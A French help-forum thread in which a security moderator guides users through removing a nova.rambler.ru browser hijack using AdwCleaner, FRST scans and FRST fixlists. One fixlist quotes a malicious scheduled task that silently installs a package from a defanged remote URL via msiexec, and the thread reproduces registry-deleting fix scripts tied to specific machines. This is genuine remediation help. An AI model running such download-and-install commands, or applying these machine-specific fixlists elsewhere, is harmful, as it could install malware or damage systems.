Supprimer nova.rambler.ru de Chrome

Résolu/Fermé
Shoku666 Messages postés 2 Date d'inscription samedi 17 décembre 2016 Statut Membre Dernière intervention 17 décembre 2016 - Modifié par Malekal_morte- le 17/12/2016 à 11:47
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 1 juin 2017 à 08:12
Bonjour à tous, j'ai un gros problème avec chrome quand je fais une recherche ça me redirige vers un site qui s'appelle nova.rambler.ru sauf que quand je vais dans les paramètres pour le supprimer il n'apparaît pas. Si vous avez des solutions je suis preneur.

Ps: j'ai déjà essayé de changé de navigateur et de réinstaller chrome
A voir également:

15 réponses

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 629
17 déc. 2016 à 11:47
Salut,

Windows a été infecté par des adwares et programmes parasites. Ces indésirables sont connus pour provoquer des affichages de publicités et occasionner de sérieux ralentissements sur tes navigateurs WEB.
Créer un support de récupération pour Windows 10, 8.1 ou 7
Voici les étapes de la procédure à suivre :

1°)
Suis le tutoriel AdwCleaner d'Xplode
  • Télécharge le sur ton Bureau ou dans ton dossier des téléchargements,
  • Lance "AdwCleaner" puis clique sur [Scanner],
  • L'analyse va durer plusieurs minutes, patiente,
  • Une fois le scan terminé, ne décoche rien, clique sur [Nettoyer],
  • Une fois le nettoyage terminé, un rapport va s'ouvrir,
  • Copie/colle le contenu du rapport dans ta prochaine réponse.


Si le copié/collé ne fonctionne pas, utilise le site http://pjjoint.malekal.com/ pour héberger ton rapport, donne le lien du rapport dans un nouveau message.

Note : Le rapport est également sauvegardé sous C:\AdwCleaner[S1].txt

2°)
Réinitialise/Répare les navigateurs WEB :

3°) FRST
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.


6
Shoku666 Messages postés 2 Date d'inscription samedi 17 décembre 2016 Statut Membre Dernière intervention 17 décembre 2016
17 déc. 2016 à 11:55
Merci beaucoup ! ;)
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 629
26 avril 2017 à 08:56
Désinstalle :
Apowersoft Gestionnaire de Smartphone
Intel® Security Assist
Java



Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :


CreateRestorePoint:
CloseProcesses:
Task: {302CFD18-1862-4239-8D62-61384902432E} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\SymErr.exe
HKLM\...\Providers\1sl6jw2e: C:\Program Files (x86)\Chquchzasele Configuration\local64spl.dll [312320 2017-04-25] ()
ShellExecuteHooks: Pas de nom - {61D77BDE-2363-11E7-83F8-64006A5CFC23} - C:\Users\titouan.balandier\AppData\Roaming\Clelisp\Duceward.dll [145408 2017-04-25] ()
S2 srcsrv; C:\WINDOWS\src_srv\winsrcsrv.exe [X]
Task: {567717D7-97C6-410C-A579-E6BB7D989D44} - System32\Tasks\Dynamic Portable => Rundll32.exe "C:\Program Files\Dynamic Portable\Dynamic Portable.dll",NbAIDKeWV
2017-04-25 17:02 - 2017-04-25 17:02 - 00719521 _____ C:\WINDOWS\unins001.exe
2017-04-25 17:02 - 2017-04-25 17:02 - 00016832 _____ C:\WINDOWS\System32\Tasks\Dynamic Portable
2017-04-25 17:02 - 2017-04-25 17:02 - 00003660 _____ C:\WINDOWS\unins001.dat
2017-04-25 17:02 - 2017-04-25 17:02 - 00000000 ____D C:\Program Files\Dynamic Portable
2017-04-25 16:58 - 2017-04-25 16:59 - 00000000 ____D C:\Users\titouan.balandier\AppData\Local\Demoingshhutain
2017-04-25 16:58 - 2017-04-25 16:58 - 00006198 _____ C:\WINDOWS\System32\Tasks\Chquchzasele Configuration
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Users\titouan.balandier\AppData\Roaming\Clelisp
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Program Files (x86)\Ghiveiedikent
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Program Files (x86)\Chquchzasele Configuration
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",

A gauche, place toi sur le Bureau,

Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.


Redémarre l'ordinateur.

2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :

3°)
fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite

4°)
Vois s'il y a des améliorations
Refais un scan FRST et donne à nouveau les rapports via pjjoint.

2
jedi08 Messages postés 539 Date d'inscription samedi 3 octobre 2009 Statut Membre Dernière intervention 13 août 2022 114
17 déc. 2016 à 11:45
Bonjour,

As tu essayé d'aller dans Paramétres, dans les rubriques Parametres, Apparence et rechercher. Ensuite de regarder quels moteurs de recherches est existants et éventuellement supprimer ceux qui ne conviennent pas.
0
Titba90 Messages postés 6 Date d'inscription mardi 25 avril 2017 Statut Membre Dernière intervention 27 avril 2017
25 avril 2017 à 22:02
Bonjour,
Malgré que le sujet soit assez ancien je voulais savoir si il serait toujours possible de me donner une réponse par rapport au 3 fichier que j'ai obtenu :
Frst: https://pjjoint.malekal.com/files.php?id=FRST_20170425_w10g13u8j8w6
Addition: https://pjjoint.malekal.com/files.php?id=20170425_h8i146d12l13
Shortcut: https://pjjoint.malekal.com/files.php?id=20170425_q10e9f9i5j10

Je vous remercie d'avance si une personne est capable de me donner un fix à ce problème.
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

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Titba90 Messages postés 6 Date d'inscription mardi 25 avril 2017 Statut Membre Dernière intervention 27 avril 2017
26 avril 2017 à 09:59
Voilà ce qu'il y a dans le fichier texte que j'ai obtenu :
Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 23-04-2017 01
Exécuté par titouan.balandier (26-04-2017 09:39:12) Run:1
Exécuté depuis C:\Users\titouan.balandier\Desktop
Profils chargés: titouan.balandier (Profils disponibles: titouan.balandier)
Mode d'amorçage: Normal
==============================================

fixlist contenu:

CreateRestorePoint:
CloseProcesses:
Task: {302CFD18-1862-4239-8D62-61384902432E} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.6.0.142\SymErr.exe
HKLM\...\Providers\1sl6jw2e: C:\Program Files (x86)\Chquchzasele Configuration\local64spl.dll [312320 2017-04-25] ()
ShellExecuteHooks: Pas de nom - {61D77BDE-2363-11E7-83F8-64006A5CFC23} - C:\Users\titouan.balandier\AppData\Roaming\Clelisp\Duceward.dll [145408 2017-04-25] ()
S2 srcsrv; C:\WINDOWS\src_srv\winsrcsrv.exe [X]
Task: {567717D7-97C6-410C-A579-E6BB7D989D44} - System32\Tasks\Dynamic Portable => Rundll32.exe "C:\Program Files\Dynamic Portable\Dynamic Portable.dll",NbAIDKeWV
2017-04-25 17:02 - 2017-04-25 17:02 - 00719521 _____ C:\WINDOWS\unins001.exe
2017-04-25 17:02 - 2017-04-25 17:02 - 00016832 _____ C:\WINDOWS\System32\Tasks\Dynamic Portable
2017-04-25 17:02 - 2017-04-25 17:02 - 00003660 _____ C:\WINDOWS\unins001.dat
2017-04-25 17:02 - 2017-04-25 17:02 - 00000000 ____D C:\Program Files\Dynamic Portable
2017-04-25 16:58 - 2017-04-25 16:59 - 00000000 ____D C:\Users\titouan.balandier\AppData\Local\Demoingshhutain
2017-04-25 16:58 - 2017-04-25 16:58 - 00006198 _____ C:\WINDOWS\System32\Tasks\Chquchzasele Configuration
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Users\titouan.balandier\AppData\Roaming\Clelisp
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Program Files (x86)\Ghiveiedikent
2017-04-25 16:58 - 2017-04-25 16:58 - 00000000 ____D C:\Program Files (x86)\Chquchzasele Configuration
EmptyTemp:
RemoveProxy:
Reboot:


Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{302CFD18-1862-4239-8D62-61384902432E} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{302CFD18-1862-4239-8D62-61384902432E} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Norton Security\Norton Autofix => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Norton Security\Norton Autofix => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\1sl6jw2e => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order 1sl6jw2e => supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{61D77BDE-2363-11E7-83F8-64006A5CFC23} => valeur supprimé(es) avec succès
HKCR\CLSID\{61D77BDE-2363-11E7-83F8-64006A5CFC23} => clé non trouvé(e).
HKLM\System\CurrentControlSet\Services\srcsrv => clé supprimé(es) avec succès
srcsrv => service supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{567717D7-97C6-410C-A579-E6BB7D989D44} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{567717D7-97C6-410C-A579-E6BB7D989D44} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Dynamic Portable => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Dynamic Portable => clé supprimé(es) avec succès
C:\WINDOWS\unins001.exe => déplacé(es) avec succès
"C:\WINDOWS\System32\Tasks\Dynamic Portable" => non trouvé(e).
C:\WINDOWS\unins001.dat => déplacé(es) avec succès
C:\Program Files\Dynamic Portable => déplacé(es) avec succès
C:\Users\titouan.balandier\AppData\Local\Demoingshhutain => déplacé(es) avec succès
C:\WINDOWS\System32\Tasks\Chquchzasele Configuration => déplacé(es) avec succès
C:\Users\titouan.balandier\AppData\Roaming\Clelisp => déplacé(es) avec succès
C:\Program Files (x86)\Ghiveiedikent => déplacé(es) avec succès
C:\Program Files (x86)\Chquchzasele Configuration => déplacé(es) avec succès

========= RemoveProxy: =========

HKLM\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies\\ => valeur supprimé(es) avec succès
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => valeur supprimé(es) avec succès
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => valeur supprimé(es) avec succès
HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => valeur supprimé(es) avec succès
HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => valeur supprimé(es) avec succès
HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => valeur supprimé(es) avec succès
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1826810316-1476713970-984432989-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => valeur supprimé(es) avec succès
HKU\S-1-5-21-1826810316-1476713970-984432989-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => valeur supprimé(es) avec succès
HKU\S-1-5-21-1826810316-1476713970-984432989-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1826810316-1476713970-984432989-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 6053888 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 8800079 B
Java, Flash, Steam htmlcache => 451936510 B
Windows/system/drivers => 180777231 B
Edge => 781582 B
Chrome => 7648075 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 3314 B
NetworkService => 11018 B
titouan.balandier => 71413445 B

RecycleBin => 8523232006 B
EmptyTemp: => 8.6 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

Fin de Fixlog 09:42:04

0
Titba90 Messages postés 6 Date d'inscription mardi 25 avril 2017 Statut Membre Dernière intervention 27 avril 2017
26 avril 2017 à 10:35
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 629
26 avril 2017 à 22:47
y a du mieux ?
0
Titba90 Messages postés 6 Date d'inscription mardi 25 avril 2017 Statut Membre Dernière intervention 27 avril 2017
26 avril 2017 à 23:12
Petite amélioration niveau vitesse mais une fois la recherche est lancée je retourne sur nova.Rumble.ru.
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 629
27 avril 2017 à 08:40
Refais un nettoyage Malwarebytes

puis :

Réinstalle proprement Google Chrome, en suivant exactement cette procédure : https://www.malekal.com//reparer-google-chrome/#Reinstaller_Google_Chrome
0
Titba90 Messages postés 6 Date d'inscription mardi 25 avril 2017 Statut Membre Dernière intervention 27 avril 2017
Modifié le 27 avril 2017 à 10:20
Google remarche tout à fait normalement je te remercie énormément pour ton aide il m'a beaucoup aidé je te souhaite une bonne continuation. ;-)
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 629
27 avril 2017 à 10:32
Supprime le dossier C:\FRST


Termine par un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite


Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)


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Titba90 Messages postés 6 Date d'inscription mardi 25 avril 2017 Statut Membre Dernière intervention 27 avril 2017
27 avril 2017 à 10:37
Merci pour le conseil je fais ça de suite
0
voici ce que j'Ai eu quand j'ai fait le nettoyage :

http://pjjoint.malekal.com/files.php?id=20170516_s11z9d10y9z7
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 629
16 mai 2017 à 18:11
Salut,

il faut suivre toute la procédure : https://forums.commentcamarche.net/forum/affich-34188115-supprimer-nova-rambler-ru-de-chrome#2
et donner tous les rapports
0
BlackAngel14 Messages postés 2 Date d'inscription mercredi 31 mai 2017 Statut Membre Dernière intervention 31 mai 2017
31 mai 2017 à 13:32
Bonjour à tous! J'ai le même problème de Rambler avec Chrome. J'ai suivi toutes les étapes jusqu'à 3°) FRST. Je vous mets ici les liens pour les différents fichiers .txt. Je sais que le sujet date mais ce serait vraiment cool d'avoir votre aide parce que ce Rambler là me pourrit là vie! Cordialement.

Addition: https://pjjoint.malekal.com/files.php?read=20170531_z12o613o7n12

FRST: https://pjjoint.malekal.com/files.php?id=FRST_20170531_y14t5l10l12l7

Shortcut: https://pjjoint.malekal.com/files.php?id=20170531_b8k9d15y5c5
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 629
31 mai 2017 à 14:55
Salut,

Essaye ça :

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
Task: {47EBBBC2-2B28-4004-A482-7238E810A9D3} - System32\Tasks\Microsoft\Windows\DeviceSettings\Qivither => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST9500325AS_6VETSLGAXXXX6VETSLGA&d=20170527 /q <==== ATTENTION
2017-05-27 15:50 - 2017-05-31 09:40 - 00000000 ____D C:\Program Files\Shijuly
2017-05-27 15:50 - 2017-05-27 15:50 - 00001048 _____ C:\Users\USER\Desktop\Play Warframe.lnk
2017-05-27 15:50 - 2017-05-27 15:50 - 00000000 ____D C:\Users\USER\AppData\Local\Anigichghocet
2014-12-03 22:34 - 2014-12-12 20:15 - 0000757 _____ () C:\Users\USER\AppData\Roaming\bibstats
2015-01-25 16:12 - 2015-01-25 16:12 - 0002086 _____ () C:\Users\USER\AppData\Roaming\LQ
2015-03-31 08:14 - 2015-03-31 08:14 - 0001171 _____ () C:\Users\USER\AppData\Roaming\QFXZzFTM
2016-06-26 17:32 - 2016-06-26 17:32 - 0000000 _____ () C:\Users\USER\AppData\Local\{AB0240B1-BB71-4DBF-870A-00200B1FC659}
2015-12-09 23:30 - 2015-12-09 23:30 - 0000000 _____ () C:\Users\USER\AppData\Local\{D1F2155A-3548-4BA9-86B5-6203406CB728}
2016-07-28 17:32 - 2016-07-28 17:32 - 0000000 _____ () C:\Users\USER\AppData\Local\{E8B1C71D-D2EA-4ACA-B16C-73A43C9BA6AE}
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:


Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.


2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
0
BlackAngel14 Messages postés 2 Date d'inscription mercredi 31 mai 2017 Statut Membre Dernière intervention 31 mai 2017
31 mai 2017 à 23:01
Merci beaucoup Malekal! Plus de rambler! Je t'écris depuis mon navigateur chrome clean.Bonne continuation à toi!
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Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 629
1 juin 2017 à 08:12
de rien :)
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